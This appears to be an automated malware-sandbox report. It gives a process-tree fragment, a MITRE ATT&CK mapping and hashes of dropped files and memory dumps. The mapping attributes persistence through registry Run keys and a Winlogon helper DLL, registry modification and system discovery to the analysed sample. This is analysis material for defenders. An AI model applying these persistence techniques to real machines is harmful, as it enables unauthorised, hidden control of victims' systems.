"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
PID:1104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

Filesize
97B

MD5
6b3c7df657dac84939df4efdd1a1c4c1

SHA1
570cdd50e12f70ec5ee6e6da38f88f6eb7682733

SHA256
2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

SHA512
79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

Filesize
36KB

MD5
8aaad0f4eb7d3c65f81c6e6b496ba889

SHA1
231237a501b9433c292991e4ec200b25c1589050

SHA256
813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

SHA512
1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe

Filesize
36KB

MD5
406347732c383e23c3b1af590a47bccd

SHA1
fae764f62a396f2503dd81eefd3c7f06a5fb8e5f

SHA256
e0a9f5c75706dc79a44d0c890c841b2b0b25af4ee60d0a16a7356b067210038e

SHA512
18905eaad8184bb3a7b0fe21ff37ed2ee72a3bd24bb90cbfcad222cf09e2fa74e886d5c687b21d81cd3aec1e6c05891c24f67a8f82bafd2aceb0e0dcb7672ce7

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133357754822514637.txt

Filesize
75KB

MD5
22f39923e2942e5a02c3a5f91cefd45b

SHA1
c33909cb5ae1ad55b18b38b6aedf79c5a2216e13

SHA256
66457d8ac009ef25f44e676156bc058db582b2a3b431e2589435bb27477328c6

SHA512
17a2afe32e74150e58080055f3e67d3d4892828d9df28905a0e67227055b61eeab2a4764acf0b701bc481568fac2ccb889b326379319723fae838f8ce09e94fd

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133357754822514637.txt.~tmp

Filesize
75KB

MD5
22f39923e2942e5a02c3a5f91cefd45b

SHA1
c33909cb5ae1ad55b18b38b6aedf79c5a2216e13

SHA256
66457d8ac009ef25f44e676156bc058db582b2a3b431e2589435bb27477328c6

SHA512
17a2afe32e74150e58080055f3e67d3d4892828d9df28905a0e67227055b61eeab2a4764acf0b701bc481568fac2ccb889b326379319723fae838f8ce09e94fd

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

Filesize
97B

MD5
6b3c7df657dac84939df4efdd1a1c4c1

SHA1
570cdd50e12f70ec5ee6e6da38f88f6eb7682733

SHA256
2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

SHA512
79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

Filesize
97B

MD5
6b3c7df657dac84939df4efdd1a1c4c1

SHA1
570cdd50e12f70ec5ee6e6da38f88f6eb7682733

SHA256
2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

SHA512
79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

Filesize
97B

MD5
6b3c7df657dac84939df4efdd1a1c4c1

SHA1
570cdd50e12f70ec5ee6e6da38f88f6eb7682733

SHA256
2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

SHA512
79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

Filesize
97B

MD5
6b3c7df657dac84939df4efdd1a1c4c1

SHA1
570cdd50e12f70ec5ee6e6da38f88f6eb7682733

SHA256
2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

SHA512
79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

Download Submit
memory/388-253-0x000001C3AD4A0000-0x000001C3AD4C0000-memory.dmp

Filesize
128KB

Download
memory/388-250-0x000001C3AD4E0000-0x000001C3AD500000-memory.dmp

Filesize
128KB

Download
memory/388-256-0x000001C3ADAC0000-0x000001C3ADAE0000-memory.dmp

Filesize
128KB

Download
memory/544-143-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/544-142-0x0000000004920000-0x00000000049B2000-memory.dmp

Filesize
584KB

Download
memory/544-141-0x0000000075350000-0x0000000075B00000-memory.dmp

Filesize
7.7MB

Download
memory/544-181-0x0000000075350000-0x0000000075B00000-memory.dmp

Filesize
7.7MB

Download
memory/544-137-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/544-187-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/1108-172-0x00000267462A0000-0x00000267462C0000-memory.dmp

Filesize
128KB

Download
memory/1108-175-0x0000026746260000-0x0000026746280000-memory.dmp

Filesize
128KB

Download
memory/1108-179-0x0000026746670000-0x0000026746690000-memory.dmp

Filesize
128KB

Download
memory/2184-229-0x000002534B240000-0x000002534B260000-memory.dmp

Filesize
128KB

Download
memory/2184-232-0x000002534B200000-0x000002534B220000-memory.dmp

Filesize
128KB

Download
memory/2184-234-0x000002534B600000-0x000002534B620000-memory.dmp

Filesize
128KB

Download
memory/2320-213-0x00000212BD0C0000-0x00000212BD0E0000-memory.dmp

Filesize
128KB

Download
memory/2320-216-0x00000212BD6E0000-0x00000212BD700000-memory.dmp

Filesize
128KB

Download
memory/2320-210-0x00000212BD100000-0x00000212BD120000-memory.dmp

Filesize
128KB

Download
memory/3064-140-0x0000000075350000-0x0000000075B00000-memory.dmp

Filesize
7.7MB

Download
memory/3064-134-0x0000000075350000-0x0000000075B00000-memory.dmp

Filesize
7.7MB

Download
memory/3064-135-0x0000000005ED0000-0x0000000006474000-memory.dmp

Filesize
5.6MB

Download
memory/3064-133-0x0000000000F80000-0x0000000000F9C000-memory.dmp

Filesize
112KB

Download
memory/3064-136-0x0000000005AC0000-0x0000000005B5C000-memory.dmp

Filesize
624KB

Download
memory/3244-145-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/3508-151-0x000001CE53490000-0x000001CE534B0000-memory.dmp

Filesize
128KB

Download
memory/3508-155-0x000001CE53450000-0x000001CE53470000-memory.dmp

Filesize
128KB

Download
memory/3508-157-0x000001CE538A0000-0x000001CE538C0000-memory.dmp

Filesize
128KB

Download